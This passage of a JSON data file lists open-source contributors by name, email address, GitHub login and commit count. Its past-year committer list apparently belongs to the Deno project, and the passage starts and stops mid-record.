Zingeler","email":"eezing@gmail.com","login":"eezing","count":1},{"name":"Erik Price","email":"github@erikprice.net","login":"erik","count":1},{"name":"Erin of Yukis","email":"erin-dev@yukis.eu","login":"ntninja","count":1},{"name":"Espen Hovlandsdal","email":"espen@hovlandsdal.com","login":"rexxars","count":1},{"name":"Evan Bertrand","email":"67847790+3bert","login":"3bert","count":1},{"name":"Exidex","email":"16986685+Exidex","login":"Exidex","count":1},{"name":"Hanseo Jo","email":"starkensin@gmail.com","login":"starkensin","count":1},{"name":"Eyal Shalev","email":"eyalsh@gmail.com","login":"Eyal-Shalev","count":1},{"name":"Fabian","email":"43351274+0xk1f0","login":"0xk1f0","count":1},{"name":"Fabriece Sumuni","email":"sfabriece","login":"sfabriece","count":1},{"name":"Fallenhh","email":"fallen2hh@gmail.com","login":"Fallenhh","count":1},{"name":"David Emanuel Buchmann","email":"david.buchmann@gmail.com","login":"wuurrd","count":1},{"name":"David Gonzalez","email":"dagonza1983@gmail.com","login":"dgonzalez","count":1},{"name":"David Michael Gregg","email":"davegregg@gmail.com","login":"davegregg","count":1},{"name":"David Yamnitsky","email":"david@yamnitsky.com","login":"nitsky","count":1},{"name":"Dayan C. Galiazzi","email":"galiazzi.dayan@gmail.com","login":"galiazzi","count":1},{"name":"De Rouck Antoine","email":"pulsead94@gmail.com","login":"antoine-dr","count":1},{"name":"Dean Srebnik","email":"49134864+load1n9","login":"load1n9","count":1},{"name":"Deepanshu Utkarsh","email":"duci9y","login":"duci9y","count":1},{"name":"Developing","email":"pawanakhil.dasari@gmail.com","login":"akhill10","count":1},{"name":"Dmitry Teplov","email":"teplov.work@gmail.com","login":"tplk","count":1},{"name":"Dominic DiGiacomo","email":"ddigiacomo@triptychlabs.io","login":"whymidnight","count":1},{"name":"Don Jayamanne","email":"don.jayamanne@outlook.com","login":"DonJayamanne","count":1},{"name":"Doni Rubiagatra","email":"rubiagatra@gmail.com","login":"rubiagatra","count":1},{"name":"EathonYe","email":"yyye33@yahoo.com","login":"EathonYe","count":1},{"name":"EdamAmex","email":"121654029+EdamAme-x","login":"EdamAme-x","count":1},{"name":"Eder Lima","email":"64004309+asynched","login":"asynched","count":1},{"name":"EduM22","email":"38257387+EduM22","login":"EduM22","count":1},{"name":"Edward Bebbington","email":"47337480+ebebbington","login":"ebebbington","count":1},{"name":"Edward Elric","email":"SASUKE688848@gmail.com","login":"SASUKE40","count":1},{"name":"Gitoffthelawn","email":"Gitoffthelawn","login":"Gitoffthelawn","count":1},{"name":"Goffert van Gool","email":"ruphin@ruphin.net","login":"ruphin","count":1},{"name":"Gudmund Vatn","email":"gudmund.vatn@gmail.com","login":"gvatn","count":1},{"name":"Guilherme Bernal","email":"guilherme@cubos.io","login":"lbguilherme","count":1},{"name":"Gustrb","email":"gustavo@minhavisita.com.br","login":"Gustrb","count":1},{"name":"Gxyz","email":"18710890823@163.com","login":"gxyz","count":1},{"name":"Gyubong","email":"jopemachine@naver.com","login":"jopemachine","count":1},{"name":"HUGOALH","email":"hugoalh@gmail.com","login":"hugoalh","count":1},{"name":"Hans","email":"weartistt@gmail.com","login":"weartist","count":1},{"name":"JavaScriptDude","email":"tim.c.quinn@gmail.com","login":"JavaScriptDude","count":1},{"name":"Haobo Zhao","email":"34687745+Haobo-Zhao","login":"Haobo-Zhao","count":1},{"name":"Haoran Liu","email":"1051276278@qq.com","login":"raptazure","count":1},{"name":"Harry Wolff","email":"hswolff","login":"hswolff","count":1},{"name":"Haruto333","email":"haruto.works333@gmail.com","login":"Haruto-works333","count":1},{"name":"Hasan-Alrimawi","email":"108812045+Hasan-Alrimawi","login":"Hasan-Alrimawi","count":1},{"name":"Hendrik","email":"gemret@gmail.com","login":"HoverBaum","count":1},{"name":"Henrique Emanoel Viana","email":"hv5088@gmail.com","login":"hviana","count":1},{"name":"Henry Zhuang","email":"zhuanghengfei@gmail.com","login":"ngot","count":1},{"name":"Jose Fernandez","email":"me@jrfernandez.com","login":"jfernandez","count":1},{"name":"Faycel","email":"faycal.khe@gmail.com","login":"FaycalKhe","count":1},{"name":"Felix Yan","email":"felixonmars@archlinux.org","login":"felixonmars","count":1},{"name":"Filippo Rossi","email":"Qu4k","login":"Qu4k","count":1},{"name":"Florian Häglsperger","email":"florian@haeglsperger.com","login":"codeflo","count":1},{"name":"Florian Hämmerle","email":"lusbuab","login":"lusbuab","count":1},{"name":"Frank Fang","email":"FrankFang1990@gmail.com","login":"FrankFang","count":1},{"name":"Freddy Fallon","email":"freddyfallon@gmail.com","login":"freddyfallon","count":1},{"name":"Fukuda Naoto","email":"naoto.fukuda1217@gmail.com","login":"fuku710","count":1},{"name":"Gabriele Mastrapasqua","email":"gabriele.mastrapasqua@gmail.com","login":"gabriele-mastrapasqua","count":1},{"name":"Gamer Omega","email":"76910135+gamer0mega","login":"gamer0mega","count":1},{"name":"Ganesh R","email":"ganesramesh110@gmail.com","login":"ganes1410","count":1},{"name":"Garcia","email":"90156453+Phosra","login":"Phosra","count":1},{"name":"Garrone Joseph","email":"joseph.garrone@ensimag.grenoble-inp.fr","login":"garronej","count":1},{"name":"Gaurav Dubey","email":"gauravdubey0107@gmail.com","login":"gaurav0107","count":1},{"name":"Gene Parmesan Thomas","email":"201852096+gopoto","login":"gopoto","count":1},{"name":"Geoffrey Smith","email":"smith.geoffrey.d@gmail.com","login":"geoffreysmith","count":1},{"name":"Gerald","email":"gera2ld@live.com","login":"gera2ld","count":1},{"name":"Giacomo Rizzi","email":"gufoes@gmail.com","login":"gufoe","count":1},{"name":"Giorgi Rostomashvili","email":"rostogiorgi@gmail.com","login":"grosto","count":1},{"name":"Michael Horstmann","email":"mhorstmann@posteo.de","login":"mhrstmnn","count":1},{"name":"Michael Kurze","email":"michael.codes@pm.me","login":"x1B","count":1},{"name":"Michael Lazarev","email":"lazarev.michael@gmail.com","login":"milaz","count":1},{"name":"Michael Tyson","email":"myty","login":"myty","count":1},{"name":"Michael Yuan","email":"michael@michaelyuan.com","login":"juntao","count":1},{"name":"Michal Piechowiak","email":"misiek.piechowiak@gmail.com","login":"pieh","count":1},{"name":"Michał Zdunek","email":"mzdunek93","login":"mzdunek93","count":1},{"name":"Miguel Rodrigues","email":"64497525+mbrdg","login":"mbrdg","count":1},{"name":"Mihal Malostanidis","email":"qm3ster@gmail.com","login":"qm3ster","count":1},{"name":"Oscar Linde","email":"lindeoscar@gmail.com","login":"linde12","count":1},{"name":"Mikhail","email":"connormiha1@gmail.com","login":"Connormiha","count":1},{"name":"Mikko","email":"Andriamanitra","login":"Andriamanitra","count":1},{"name":"Minh Vu","email":"vuhoangminh97@gmail.com","login":"fallintoplace","count":1},{"name":"MkDev11","email":"94194147+MkDev11","login":"MkDev11","count":1},{"name":"Mohammed Chelouti","email":"70812484+motato1","login":"motato1","count":1},{"name":"Mohammed Salman","email":"msal4@outlook.com","login":"msal4","count":1},{"name":"Moritz Gunz","email":"moritz.gunz@gmail.com","login":"NeoLegends","count":1},{"name":"MrEconomical","email":"47700125+MrEconomical","login":"MrEconomical","count":1},{"name":"Mudit Ameta","email":"zeusdeux@gmail.com","login":"zeusdeux","count":1},{"name":"Matt Ezell","email":"ezell.matt@gmail.com","login":"mattezell","count":1},{"name":"Matt Kane","email":"m@mk.gg","login":"ascorbic","count":1},{"name":"Matthew Adams","email":"matthew@matthewadams.me","login":"matthewadams","count":1},{"name":"Matthew Lennon","email":"mattlennon3@hotmail.co.uk","login":"mattlennon3","count":1},{"name":"Mattias Buelens","email":"649348+MattiasBuelens","login":"MattiasBuelens","count":1},{"name":"Mattias Runge-Broberg","email":"mattias@runge.se","login":"mattiasrunge","count":1},{"name":"Max","email":"martynmaksim.w@gmail.com","login":"maxxxymum","count":1},{"name":"Max Coplan","email":"mchcopl@gmail.com","login":"vegerot","count":1},{"name":"Max Goodhart","email":"c@chromakode.com","login":"chromakode","count":1},{"name":"Max Nest","email":"udomix.udomix@gmail.com","login":"maxnest0x0","count":1},{"name":"Maxim","email":"59533214+biryukovmaxim","login":"biryukovmaxim","count":1},{"name":"Maximilien Mellen","email":"maxmellen0@gmail.com","login":"maxmellen","count":1},{"name":"Maxwell Calkin","email":"101308415+MaxwellCalkin","login":"MaxwellCalkin","count":1},{"name":"Mayank Agarwal","email":"mayankagarwal44442@gmail.com","login":"mayankagarwals","count":1},{"name":"Mayank Kumar","email":"103447831+mayank-Pareek","login":"mayank-Pareek","count":1},{"name":"McSneaky","email":"kevin@synter.ee","login":"McSneaky","count":1},{"name":"Meet Dhanani","email":"124246235+meetdhanani17","login":"meetdhanani17","count":1},{"name":"Meir Blachman","email":"meirblachman@gmail.com","login":"Meir017","count":1},{"name":"Michael Busby","email":"prodigysim@gmail.com","login":"ProdigySim","count":1},{"name":"Oliver Kuckertz","email":"oliver@kuckertz.cloud","login":"mologie","count":1},{"name":"Oliver Medhurst","email":"oj@oojmed.com","login":"CanadaHonk","count":1},{"name":"Olivér Falvai","email":"ofalvai@gmail.com","login":"ofalvai","count":1},{"name":"Opliko","email":"25460763+oplik0","login":"oplik0","count":1},{"name":"Outvi V","email":"19144373+outloudvi","login":"outloudvi","count":1},{"name":"Paco","email":"pakoito","login":"pakoito","count":1},{"name":"Pankaj Patil","email":"pankaj.patil2099@hotmail.com","login":"Patil2099","count":1},{"name":"Parker Gabel","email":"parkerdgabel@email.arizona.edu","login":"parkerdgabel","count":1},{"name":"Patrick Uftring","email":"14282874+pjuftring","login":"pjuftring","count":1},{"name":"Paul Browne","email":"Paulmatthewbrowne@gmail.com","login":"Paul-Browne","count":1},{"name":"Paul Jones","email":"28073230+paulmj7","login":"paulmj7","count":1},{"name":"Pavan Kumar","email":"kumarpavan1309@gmail.com","login":"itspa1","count":1},{"name":"Pavel Hrách","email":"pavel@hrach.email","login":"silen-z","count":1},{"name":"Percy","email":"kecrily@gmail.com","login":"kecrily","count":1},{"name":"Peter","email":"peter@kodifiera.se","login":"peterpanduro","count":1},{"name":"Peter Shank","email":"peter@shank.com","login":"petershank","count":1},{"name":"Phil Rukin","email":"phil.ficus@gmail.com","login":"phil-r","count":1},{"name":"Philipp A","email":"flying-sheep@web.de","login":"flying-sheep","count":1},{"name":"Pluto","email":"128720033+it-education-md","login":"it-education-md","count":1},{"name":"Murat Kirazkaya","email":"77299279+GroophyLifefor","login":"GroophyLifefor","count":1},{"name":"Muthu Kumar","email":"muthukumar@thefeathers.in","login":"MKRhere","count":1},{"name":"Naju Mancheril","email":"najumancheril","login":"najumancheril","count":1},{"name":"Nandhis","email":"45960035+msnandhis","login":"msnandhis","count":1},{"name":"Nano Miratus","email":"nanomiratus@gmail.com","login":"nnmrts","count":1},{"name":"Narendra Kamath G","email":"narendrakamathg@gmail.com","login":"Narendra-Kamath","count":1},{"name":"Neil Richter","email":"me@neilrichter.com","login":"noook","count":1},{"name":"Lenni","email":"guentherhanslphdyt@gmail.com","login":"Lenni009","count":1},{"name":"Nicholas Rodrigues Lordello","email":"nlordell@gmail.com","login":"nlordell","count":1},{"name":"Nick Randall","email":"nicksrandall","login":"nicksrandall","count":1},{"name":"Nick Williams","email":"accounts.github@nickawilliams.com","login":"RogWilco","count":1},{"name":"Niclas Overby","email":"niclas@overby.me","login":"noverby","count":1},{"name":"Nicola Bovolato","email":"61934734+nicolabovolato","login":"nicolabovolato","count":1},{"name":"Nicolas Stucki","email":"nicolas.stucki@gmail.com","login":"nicolasstucki","count":1},{"name":"Niklas Eicker","email":"git@nikl.me","login":"NiklasEi","count":1},{"name":"Nikolay Karadzhov","email":"hukuuu@gmail.com","login":"nkaradzhov","count":1},{"name":"Noxazer","email":"Noxazer-FR","login":"Noxazer-FR","count":1},{"name":"Ohkubo KOHEI","email":"kuboon@trick-with.net","login":"kuboon","count":1},{"name":"Kohei Ueno","email":"k.cola119@ezweb.ne.jp","login":"cola119","count":1},{"name":"Kompwu","email":"37782740+Kompwu","login":"Kompwu","count":1},{"name":"Krhougs","email":"gh@kt.je","login":"krhougs","count":1},{"name":"Kumbham Ajay Goud","email":"ajaygoud.kumbham@gmail.com","login":"AjayKumbham","count":1},{"name":"Kuzivakwashe","email":"46272157+kuzivany","login":"kuzivany","count":1},{"name":"Kyle June","email":"kylejune1415@gmail.com","login":"KyleJune","count":1},{"name":"Kyle Tse","email":"shtse8@gmail.com","login":"shtse8","count":1},{"name":"Kyle Willmon","email":"kylewillmon@gmail.com","login":"kylewillmon","count":1},{"name":"Kyoh","email":"me@kyoh86.dev","login":"kyoh86","count":1},{"name":"Langning Zhang","email":"zln1905391059@163.com","login":"Boulea7","count":1},{"name":"Lasse Brudeskar Vikås","email":"bvx89","login":"bvx89","count":1},{"name":"Kiffie Liversage","email":"mrkiffie@gmail.com","login":"mrkiffie","count":1},{"name":"Leo Zaki","email":"16448590+7Hazard","login":"7Hazard","count":1},{"name":"Leonard Ginters","email":"leonard@linters.de","login":"predetermined","count":1},{"name":"Libing Chen","email":"libing.chen@gmail.com","login":"linux-china","count":1},{"name":"Lilian Saget-Lethias","email":"lilian.sagetlethias@gmail.com","login":"lsagetlethias","count":1},{"name":"Linus Unnebäck","email":"linus@folkdatorn.se","login":"LinusU","count":1},{"name":"Lively","email":"lala7573@gmail.com","login":"lala7573","count":1},{"name":"Livia Medeiros","email":"74449973+LiviaMedeiros","login":"LiviaMedeiros","count":1},{"name":"Kangwook Lee (이강욱)","email":"pbzweihander@gmail.com","login":"pbzweihander","count":1},{"name":"Kanishkar J","email":"kanishkarj@hotmail.com","login":"kanishkarj","count":1},{"name":"Karl Horky","email":"karl.horky@gmail.com","login":"karlhorky","count":1},{"name":"Kaveh","email":"hamidrkp@riseup.net","login":"hamidrezakp","count":1},{"name":"Kazuki Ota","email":"ota_droid@live.jp","login":"dojyorin","count":1},{"name":"Keith Maxwell","email":"keith.maxwell@gmail.com","login":"maxwell-k","count":1},{"name":"Keith Tan","email":"skeithtan@gmail.com","login":"skeithtan","count":1},{"name":"Kendell R","email":"KTibow","login":"KTibow","count":1},{"name":"Kennan Seno","email":"7852866+kennanseno","login":"kennanseno","count":1},{"name":"Kermit Xuan","email":"kermitlx@outlook.com","login":"kerm1it","count":1},{"name":"Khang Dinh","email":"thesephi@gmail.com","login":"Thesephi","count":1},{"name":"Khushraj Rathod","email":"khushraj.rathod@gmail.com","login":"khrj","count":1},{"name":"John Spurlock","email":"john.spurlock@gmail.com","login":"johnspurlock","count":1},{"name":"John Vandenberg","email":"jayvdb@gmail.com","login":"jayvdb","count":1},{"name":"Kiryl Dziamura","email":"2wontem@gmail.com","login":"kdziamura","count":1},{"name":"Kisaragi Hiu","email":"mail@kisaragi-hiu.com","login":"kisaragi-hiu","count":1},{"name":"Kit Dallege","email":"xaum.io@gmail.com","login":"kovan","count":1},{"name":"Klaus Hvam","email":"flachendk@gmail.com","login":"klaushvam","count":1},{"name":"Koen","email":"41021050+vrugtehagel","login":"vrugtehagel","count":1},{"name":"Malted","email":"59726149+ma1ted","login":"ma1ted","count":1},{"name":"Mandeep Singh","email":"mesingh90@gmail.com","login":"meSingh","count":1},{"name":"Manichandra","email":"mcnc33@gmail.com","login":"manichandra","count":1},{"name":"Manikandan Sundararajan","email":"tsmanikandan@protonmail.com","login":"itsrainingmani","count":1},{"name":"Manish Sahani","email":"142807367+manishsahanidev","login":"manishsahanidev","count":1},{"name":"Maple Miao","email":"522856232@qq.com","login":"mapleeit","count":1},{"name":"Marcin Puc","email":"5671049+tranzystorek-io","login":"tranzystorek-io","count":1},{"name":"Marcus Hultman","email":"marcus.hultman1@gmail.com","login":"marcushultman","count":1},{"name":"Mark A. Hershberger","email":"mah@everybody.org","login":"hexmode","count":1},{"name":"Mark Gibson","email":"mgibson@adaptavist.com","login":"jollytoad","count":1},{"name":"Mark Tomlin","email":"Mark@MimoCAD.io","login":"Dygear","count":1},{"name":"Marshall Walker","email":"marshallwalker@shaw.ca","login":"marshallwalker","count":1},{"name":"Martin Suchanek","email":"mrtn@nrd.io","login":"mrtns","count":1},{"name":"Masahiro Miyashiro (3846masa)","email":"3846masahiro@gmail.com","login":"3846masa","count":1},{"name":"Masato Yoshioka","email":"yoshioka0627@gmail.com","login":"mstysk","count":1},{"name":"Mason Medeiros","email":"medeiros.mck@gmail.com","login":"metamas","count":1},{"name":"Mathias Lykkegaard Lorenzen","email":"mathias.lorenzen@live.com","login":"ffMathy","count":1},{"name":"Matt Barnett-Jones","email":"mattjbones@gmail.com","login":"mattjbones","count":1},{"name":"Oleh Martsokha","email":"o.martsokha@gmail.com","login":"martsokha","count":1},{"name":"Long(Tony) Lian","email":"1040424979@qq.com","login":"TonyLianLong","count":1},{"name":"Lorran Rosa","email":"rosalorran98@gmail.com","login":"Drunpy","count":1},{"name":"Louis-Philippe Perron","email":"32278+lp","login":"lp","count":1},{"name":"Luca Barbato","email":"luca.barbato@gmail.com","login":"lu-zero","count":1},{"name":"Luca Matei Pintilie","email":"lucafulger@gmail.com","login":"AnInternetTroll","count":1},{"name":"Lucas De Angelis","email":"lucas.de-angelis@epitech.eu","login":"lucas-deangelis","count":1},{"name":"Lucas Machado","email":"44952113+machadolucasvp","login":"machadolucasvp","count":1},{"name":"Lucas Michot","email":"513603+lucasmichot","login":"lucasmichot","count":1},{"name":"Lucas Vieira","email":"vieiralucas4@gmail.com","login":"vieiralucas","count":1},{"name":"Lucas Wang","email":"cp7777.tw@hotmail.com","login":"gn00295120","count":1},{"name":"Lucas Wasilewski","email":"66091116+WasixXD","login":"WasixXD","count":1},{"name":"Luis Malheiro","email":"lmalheiro","login":"lmalheiro","count":1},{"name":"Luke","email":"6542504+luvies","login":"luvies","count":1},{"name":"Luke Ingalls","email":"45518011+lukeingalls","login":"lukeingalls","count":1},{"name":"Luke Swithenbank","email":"luke@lswith.io","login":"lswith","count":1},{"name":"Ly Nguyen","email":"contact@minhlynguyenvo.com","login":"mlyngvo","count":1},{"name":"MAKS11060","email":"31521952+MAKS11060","login":"MAKS11060","count":1},{"name":"MVEMCJSUNPE","email":"2frac.d.x@gmail.com","login":"MVEMCJSUNPE","count":1},{"name":"Makuza Mugabo Verite","email":"53856673+makuzaverite","login":"makuzaverite","count":1}],"past_year_committers":[{"name":"Bartek Iwańczuk","email":"biwanczuk@gmail.com","login":"bartlomieju","count":1114},{"name":"em","email":"em@littledivy.com","login":"divybot","count":448},{"name":"Nathan Whitaker","email":"17734409+nathanwhit","login":"nathanwhit","count":268},{"name":"David Sherret","email":"dsherret","login":"dsherret","count":208},{"name":"nathanwhitbot","email":"nathan+bot@deno.com","login":"nathanwhitbot","count":118},{"name":"Daniel Osvaldo Rahmanto","email":"daniel.rahmanto@gmail.com","login":"Tango992","count":90},{"name":"Divy","email":"dj.srivastava23@gmail.com","login":"littledivy","count":88},{"name":"Felipe Cardozo","email":"fraifelipe@gmail.com","login":"fraidev","count":77},{"name":"Leo Kettmeir","email":"crowlkats@toaxl.com","login":"crowlKats","count":65},{"name":"crowlbot","email":"280062030+crowlbot","login":"crowlbot","count":64},{"name":"denobot","email":"33910674+denobot","login":"denobot","count":44},{"name":"Fibi","email":"278973722+fibibot","login":"fibibot","count":41},{"name":"Nayeem Rahman","email":"nayeemrmn99@gmail.com","login":"nayeemrmn","count":38},{"name":"Luna","email":"279187109+lunadogbot","login":"lunadogbot","count":26},{"name":"snek","email":"snek@deno.com","login":"devsnek","count":20},{"name":"Copilot","email":"198982749+Copilot","login":"Copilot","count":17},{"name":"Kenta Moriuchi","email":"moriken@kimamass.com","login":"petamoriken","count":16},{"name":"Yusuke Tanaka","email":"yusuktan@maguro.dev","login":"magurotuna","count":14},{"name":"dependabot[bot]","email":"49699333+dependabot[bot]","login":"dependabot[bot]","count":14},{"name":"Luca Casonato","email":"hello@lcas.dev","login":"lucacasonato","count":13},{"name":"Marvin Hagemeister","email":"marvin@deno.com","login":"marvinhagemeister","count":11},{"name":"Tomas Zijdemans","email":"113360400+tomas-zijdemans","login":"tomas-zijdemans","count":9},{"name":"ud2","email":"sjx233@qq.com","login":"0f-0b","count":8},{"name":"kaju","email":"kaju@littledivy.com","login":"kajukitli","count":8},{"name":"Arnau Orriols","email":"4871949+arnauorriols","login":"arnauorriols","count":6},{"name":"lif","email":"1835304752@qq.com","login":"majiayu000","count":6},{"name":"minato32","email":"77087663+minato32","login":"minato32","count":6},{"name":"Amol Yadav","email":"amyssnipet@yahoo.com","login":"amyssnippet","count":5},{"name":"Hajime-san","email":"41257923+Hajime-san","login":"Hajime-san","count":5},{"name":"Ian Hickson","email":"ian@hixie.ch","login":"Hixie","count":5},{"name":"Lach","email":"iam@lach.pw","login":"CertainLach","count":5},{"name":"Yoshiya Hinosawa","email":"stibium121@gmail.com","login":"kt3k","count":5},{"name":"Maciej Wilk","email":"maciej.wilk@ringieraxelspringer.pl","login":"wilkmaciej","count":5},{"name":"KnorpelSenf","email":"shtrog@gmail.com","login":"KnorpelSenf","count":4},{"name":"Jens Krause","email":"47693+sectore","login":"sectore","count":4},{"name":"Yueqian Yang","email":"yueqian8@illinois.edu","login":"yyq1025","count":4},{"name":"Simon Lecoq","email":"22963968+lowlighter","login":"lowlighter","count":4},{"name":"Ryan Dahl","email":"ry@tinyclouds.org","login":"ry","count":4},{"name":"Jo Franchetti","email":"jofranchetti@gmail.com","login":"thisisjofrank","count":4},{"name":"Daniil Sivak","email":"seroperson@gmail.com","login":"seroperson","count":4},{"name":"Asher Gomez","email":"ashersaupingomez@gmail.com","login":"iuioiua","count":4},{"name":"Rohan Santhosh","email":"rohan.santhoshkumar@gmail.com","login":"Rohan5commit","count":3},{"name":"web-dev0521","email":"jasonpette1783@gmail.com","login":"web-dev0521","count":3},{"name":"scarf","email":"greenscarf005@gmail.com","login":"scarf005","count":3},{"name":"ryu","email":"114303361+ryuapp","login":"ryuapp","count":3},{"name":"gitstart-app[bot]","email":"57568882+gitstart-app[bot]","login":"gitstart-app[bot]","count":3},{"name":"badgerbees","email":"93577481+badgerbees","login":"badgerbees","count":3},{"name":"Varun Chawla","email":"34209028+veeceey","login":"veeceey","count":3},{"name":"Nik B","email":"nikicat","login":"nikicat","count":3},{"name":"MOHAMED IDAGHDOUR","email":"midaghdour@gmail.com","login":"Medo-ID","count":3},{"name":"Kunj Rathod","email":"86590228+rathodkunj2005","login":"rathodkunj2005","count":3},{"name":"Edilson Pateguana","email":"dev.258.edilson@gmail.com","login":"edilson258","count":3},{"name":"Avocet","email":"avocet@deno.com","login":"avocet-bot","count":3},{"name":"Bedis Nbiba","email":"bedisnbiba@gmail.com","login":"sigmaSd","count":3},{"name":"Rano | Ranadeep","email":"mail@rnbguy.at","login":"rnbguy","count":2},{"name":"Shaurya Singh","email":"sshaurya914@gmail.com","login":"LeSingh1","count":2},{"name":"Shivam Tiwari","email":"33183708+shivamtiwari3","login":"shivamtiwari3","count":2},{"name":"TarikSogukpinar","email":"70908075+TarikSogukpinar","login":"TarikSogukpinar","count":2},{"name":"Xiaobo Liu","email":"cppcoffee@gmail.com","login":"cppcoffee","count":2},{"name":"akazwz","email":"50396286+akazwz","login":"akazwz","count":2},{"name":"ctrl+d","email":"52456860+DanieleAurilio","login":"DanieleAurilio","count":2},{"name":"mehmet turac","email":"mehmetturac@gmail.com","login":"mturac","count":2},{"name":"sanjibani","email":"schoudhury1991@gmail.com","login":"sanjibani","count":2},{"name":"yidaduizuoye","email":"69302204+CAB233","login":"CAB233","count":2},{"name":"半岛的蒟蒻bddjr","email":"bddjr08@outlook.com","login":"bddjr","count":2},{"name":"Jake","email":"jake.champion@netlify.com","login":"JakeChampion","count":2},{"name":"AprilNEA","email":"github@sku.moe","login":"AprilNEA","count":2},{"name":"Bert Belder","email":"bertbelder@gmail.com","login":"piscisaureus","count":2},{"name":"Florian Schwalm","email":"68847951+egfx-notifications","login":"egfx-notifications","count":2},{"name":"Haruto Tanaka","email":"61040486+haru0017","login":"haru0017","count":2},{"name":"Hunnyboy1217","email":"110440428+Hunnyboy1217","login":"Hunnyboy1217","count":2},{"name":"Jimmy","email":"151764691+JimmyBowcott","login":"JimmyBowcott","count":2},{"name":"Laurence Rowe","email":"l@lrowe.co.uk","login":"lrowe","count":2},{"name":"Mahesh Thakur","email":"maheshthakur9152@gmail.com","login":"MaheshThakur9152","count":2},{"name":"Maksim Bondarenkov","email":"119937608+ognevny","login":"ognevny","count":2},{"name":"Mert Can Altin","email":"mertgold60@gmail.com","login":"mertcanaltin","count":2},{"name":"Nicholas R","email":"nico@nrako.com","login":"nrako","count":2},{"name":"Pietro Marchini","email":"pietro.marchini94@gmail.com","login":"pmarchini","count":2},{"name":"Platon Sterkhov","email":"42860321+turtletongue","login":"turtletongue","count":2},{"name":"Haruto333","email":"haruto.works333@gmail.com","login":"Haruto-works333","count":1},{"name":"HUGOALH","email":"hugoalh@gmail.com","login":"hugoalh","count":1},{"name":"Gitoffthelawn","email":"Gitoffthelawn","login":"Gitoffthelawn","count":1},{"name":"Gaurav Dubey","email":"gauravdubey0107@gmail.com","login":"gaurav0107","count":1},{"name":"Erin of Yukis","email":"erin-dev@yukis.eu","login":"ntninja","count":1},{"name":"EdamAmex","email":"121654029+EdamAme-x","login":"EdamAme-x","count":1},{"name":"Dan Gieschen Knutson","email":"19314778+Giesch","login":"Giesch","count":1},{"name":"Dan Dascalescu","email":"ddascalescu+github@gmail.com","login":"dandv","count":1},{"name":"Christian Svensson","email":"csvn.dev@gmail.com","login":"csvn","count":1},{"name":"Chase Knowlden","email":"haroldknowlden@gmail.com","login":"ChaseKnowlden","count":1},{"name":"asuka","email":"41745521+a-skua","login":"a-skua","count":1},{"name":"Alex Yang","email":"himself65@outlook.com","login":"himself65","count":1},{"name":"Alexander Kireyev","email":"ak.chatman.media@gmail.com","login":"chatman-media","count":1},{"name":"Andy","email":"87505797+AndyBodnar","login":"AndyBodnar","count":1},{"name":"Angelo R.","email":"83848714+haltandcatchwater","login":"haltandcatchwater","count":1},{"name":"Ashwin Naren","email":"arihant2math@gmail.com","login":"arihant2math","count":1},{"name":"Ayu","email":"45892908+ayuusweetfish","login":"ayuusweetfish","count":1},{"name":"Azeem Pinjari","email":"113772951+azeem30","login":"azeem30","count":1},{"name":"Bill Mill","email":"bill@billmill.org","login":"llimllib","count":1},{"name":"BitToby","email":"218712309+bittoby","login":"bittoby","count":1},{"name":"CPunisher","email":"1343316114@qq.com","login":"CPunisher","count":1},{"name":"codepage949","email":"codepage949@gmail.com","login":"codepage949","count":1},{"name":"Charles Duffy","email":"charles@dyfis.net","login":"charles-dyfis-net","count":1},{"name":"amitihere","email":"amiti.aneesh1@gmail.com","login":"amitihere","count":1},{"name":"Zephyr Lykos","email":"self@mochaa.ws","login":"mochaaP","count":1},{"name":"Yuki Ibe","email":"yibe@yibe.org","login":"yibe","count":1},{"name":"Yash Bavadiya","email":"77008538+xevrion","login":"xevrion","count":1},{"name":"WH yang","email":"whyang9701@gmail.com","login":"whyang9701","count":1},{"name":"Vivien Galuchot","email":"vivien.galuchot@gmail.com","login":"VivienGaluchot","count":1},{"name":"Vivian Roest","email":"1809198+NULLx76","login":"NULLx76","count":1},{"name":"Vamshi Krishna Pendyala","email":"vamshikrishnapendyala19@gmail.com","login":"dingdong-vamshi","count":1},{"name":"Vallabh Mahajan","email":"168367584+Vallabh-1504","login":"Vallabh-1504","count":1},{"name":"Uday Kumar Choudhary","email":"choudharyuday85@gmail.com","login":"Uday-Choudhary","count":1},{"name":"Tugrul Ates","email":"me@tugrulates.com","login":"tugrulates","count":1},{"name":"Tu Shaokun","email":"53142663+tt-a1i","login":"tt-a1i","count":1},{"name":"Tsudrat","email":"210191817+Tsudrat","login":"Tsudrat","count":1},{"name":"Ted Robertson","email":"10043369+tredondo","login":"tredondo","count":1},{"name":"Takuro Kitahara","email":"kitaharata@outlook.jp","login":"kitaharata","count":1},{"name":"Takumi Akimoto","email":"81888693+akimon658","login":"akimon658","count":1},{"name":"Steven Enamakel","email":"31011319+senamakel","login":"senamakel","count":1},{"name":"Sravanth","email":"sravanth7762@gmail.com","login":"SravanthDev","count":1},{"name":"Shannon Poole","email":"1154610+shannon","login":"shannon","count":1},{"name":"Scott Young","email":"s@sjy.au","login":"reasonableperson","count":1},{"name":"Sahil H. Mobaidin","email":"33333226+sahilmob","login":"sahilmob","count":1},{"name":"Ryan Lahman","email":"55610086+c43721","login":"c43721","count":1},{"name":"RoomWithOutRoof","email":"166608075+Jah-yee","login":"Jah-yee","count":1},{"name":"迷渡","email":"justjavac@gmail.com","login":"justjavac","count":1},{"name":"xtqqczze","email":"45661989+xtqqczze","login":"xtqqczze","count":1},{"name":"xBZZZZ","email":"91378413+xBZZZZ","login":"xBZZZZ","count":1},{"name":"withtimezone","email":"with_timezone@outlook.com","login":"withtimezone","count":1},{"name":"valentin richard","email":"valentinrich@gmail.com","login":"lifaon74","count":1},{"name":"tmimmanuel","email":"14046872+tmimmanuel","login":"tmimmanuel","count":1},{"name":"swandir","email":"swandir@icloud.com","login":"swandir","count":1},{"name":"subotac","email":"73706465+subotac","login":"subotac","count":1},{"name":"sijie-Z","email":"1683039482@qq.com","login":"sijie-Z","count":1},{"name":"r3wretrhy","email":"lzy20000419@163.com","login":"r3wretrhy","count":1},{"name":"prempyla","email":"pylaprem@gmail.com","login":"prempyla","count":1},{"name":"matisgagneux21","email":"matis+1@gagneux.ovh","login":"matisgagneux21","count":1},{"name":"maoyouaa","email":"136690485+maoyouaa","login":"maoyouaa","count":1},{"name":"likea-boss","email":"33880884+likea-boss","login":"likea-boss","count":1},{"name":"kookyleo","email":"kookyleo@gmail.com","login":"kookyleo","count":1},{"name":"kapil971390","email":"kapil69265@gmail.com","login":"kapil971390","count":1},{"name":"kantrolv","email":"kantrolvamshikrishnarao@gmail.com","login":"kantrolv","count":1},{"name":"j-k","email":"dev@j-k.io","login":"06kellyj